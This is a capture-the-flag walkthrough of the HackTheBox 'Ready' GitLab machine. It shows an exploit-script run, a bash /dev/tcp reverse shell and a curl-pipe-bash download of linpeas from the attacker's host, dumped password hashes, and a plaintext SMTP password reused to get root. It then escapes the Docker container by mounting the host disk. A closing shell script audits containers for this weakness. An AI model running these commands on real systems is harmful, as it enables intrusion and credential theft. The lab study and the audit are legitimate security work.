ready


Introduction:

Recon

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-18 20:57 EDT
Nmap scan report for 10.10.10.220
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
|_http-title: GitLab is not responding (502)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.44 seconds

Enumeration

Exploitation

(py3) eneloop@kinetic:…/hackthebox/ready/data$ python ./49334.py -u enp -p enp12345 -g http://10.10.10.220 -l 10.10.14.22 -P 4444
[+] authenticity_token: mfG76ibP38oNhTQoB2V72QWevYDjWynGuEbqUk9wg8fKlGdIezMNJltoS+j/lllg97WORKVPwwGbFIQW7Tv3jA==
[+] Creating project with random name: project4640
[+] Running Exploit
[+] Exploit completed successfully!
(py3) eneloop@kinetic:…/hackthebox/ready/data$

eneloop@kinetic:…/hackthebox/ready/data$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.220] 52862
bash -i >& /dev/tcp/10.10.14.22/4455 0>&1

eneloop@kinetic:…/hackthebox/ready/data$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.220] 41130
bash: cannot set terminal process group (488): Inappropriate ioctl for device
bash: no job control in this shell
git@gitlab:~/gitlab-rails/working$ cd /tmp
cd /tmp
git@gitlab:/tmp$ which curl
which curl
/opt/gitlab/embedded/bin/curl
git@gitlab:/tmp$ curl http://10.10.14.22:8000/linpeas.sh|bash
curl http://10.10.14.22:8000/linpeas.sh|bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0  305k    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
Starting linpeas. Caching Writable Folders...

================================( Processes, Cron, Services, Timers & Sockets )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
root 1 0.0 0.0 18044 2896 ? Ss 01:32 0:00 /bin/bash /assets/wrapper
root 12 0.0 0.0 4388 1144 ? S 01:32 0:00 runsvdir -P /opt/gitlab/service log: …………………………………………………………………………………………………………………………………………………………………………………………………………………….

Possible private SSH keys were found!
/var/opt/gitlab/gitlab-rails/etc/secrets.yml

gitlab-rails was found. Trying to dump users...
{"id"=>1, "email"=>"[email protected]", "encrypted_password"=> "$2a$10$.Kc4bwq3BqLCEzAGJVIJFeK4emNnucvAqk1vCv4Yp45yy2nmrFa.2",

{"id"=>3, "email"=>"[email protected]", "encrypted_password"=> "$2a$10$4vZAglOnEdNEe1SoNj1IE.RfotOt9gPnOXBEihjd7QBhsUmgmAdLi", "reset_password_token"=>nil,

"id"=>2, "email"=>"[email protected]", "encrypted_password"=> "$2a$10$NOMTXhO31vqykicMa6zj3O.F5PIyI9q/S4c.v22eMSfXNDdtpI2Mm", "reset_password_token"=>nil, "reset_password_sent_at"=>nil, "remember_created_at"=>nil,

"id"=>4, "email"=>"[email protected]", "encrypted_password"=> "$2a$10$7xK1UPcwvjWIo4ioCz28GeFSt.NR00AHsY2AF.gWzaWwikRVXCTXa", "reset_password_token"=>nil, "reset_password_sent_at"=>nil,

Found /opt/backup/gitlab.rb
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

[+] Unexpected in root
/root_pass
/.dockerenv
/assets
/RELEASE

-rw-r--r-- 1 dude dude 3771 Aug 31 2015 /home/dude/.bashrc
-rw-r--r-- 1 dude dude 655 May 16 2017 /home/dude/.profile

Post-exploit/PrivEsc

git@gitlab:/$ python3 -c 'import pty; pty.spawn("/bin/bash");'
python3 -c 'import pty; pty.spawn("/bin/bash");'
git@gitlab:/$ su - root
su - root
Password: wW59U!ZKMbG9+*#h

root@gitlab:~#

root@gitlab:/# fdisk -l
fdisk -l
Disk /dev/loop0: 55.4 MiB, 58052608 bytes, 113384 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop1: 55.5 MiB, 58159104 bytes, 113592 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop2: 71.3 MiB, 74797056 bytes, 146088 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop3: 71.4 MiB, 74907648 bytes, 146304 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop4: 31.1 MiB, 32595968 bytes, 63664 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop5: 31.1 MiB, 32571392 bytes, 63616 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: gpt
Disk identifier: 32558524-85A4-4072-AA28-FA341BE86C2E

Device        Start      End  Sectors Size Type
/dev/sda1      2048     4095     2048   1M BIOS boot
/dev/sda2      4096 37746687 37742592  18G Linux filesystem
/dev/sda3  37746688 41940991  4194304   2G Linux swap

root@gitlab:/# mount /dev/sda2 /host
mount /dev/sda2 /host
root@gitlab:/# cd /host
cd /host
root@gitlab:/host# ls -l

root@gitlab:~# cd /host
cd /host
root@gitlab:/host# ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr boot dev home lib32 libx32 media opt root sbin srv tmp var
root@gitlab:/host# cd root
cd root
root@gitlab:/host/root# ls
ls
docker-gitlab ready-channel root.txt snap
root@gitlab:/host/root# cat root.txt
cat root.txt
b7f98681505cd39066f67147b103c2b3
root@gitlab:/host/root#
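
The mount of /dev/sda2 from inside the container (note /.dockerenv in the linpeas output) needs two things: CAP_SYS_ADMIN in the container's effective capability set, which mount(2) requires, and the host's block device nodes exposed under /dev. The following POSIX shell audit is an added example, not part of the original write-up; it checks a container for that combination, and its function names are illustrative.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a container for the two
# conditions the mount above relied on. Function names are illustrative.

CAP_SYS_ADMIN_BIT=21   # CAP_SYS_ADMIN's bit index in the kernel capability mask

# cap_eff_from_status FILE: print the CapEff hex mask from a /proc/<pid>/status file
cap_eff_from_status() {
    awk '$1 == "CapEff:" { print $2 }' "$1"
}

# has_cap_sys_admin HEXMASK: succeed if CAP_SYS_ADMIN (needed by mount(2)) is set
has_cap_sys_admin() {
    [ -n "$1" ] && [ $(( (0x$1 >> CAP_SYS_ADMIN_BIT) & 1 )) -eq 1 ]
}

# block_devices DIR: print every block device node directly under DIR
block_devices() {
    for node in "$1"/*; do
        if [ -b "$node" ]; then echo "$node"; fi
    done
}

# verdict HEXMASK DEVICES: print a finding; fail when both conditions hold
verdict() {
    if has_cap_sys_admin "$1" && [ -n "$2" ]; then
        echo "RISK: CAP_SYS_ADMIN set and block devices exposed:" $2
        return 1
    fi
    echo "OK: CAP_SYS_ADMIN and exposed block devices not found together"
}

# Inspect the current container when /proc is available.
if [ -r /proc/self/status ]; then
    verdict "$(cap_eff_from_status /proc/self/status)" "$(block_devices /dev)" || true
fi
```

Run it as root inside the container; a RISK line means the container should be redeployed without the extra capability and device access.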

Notes: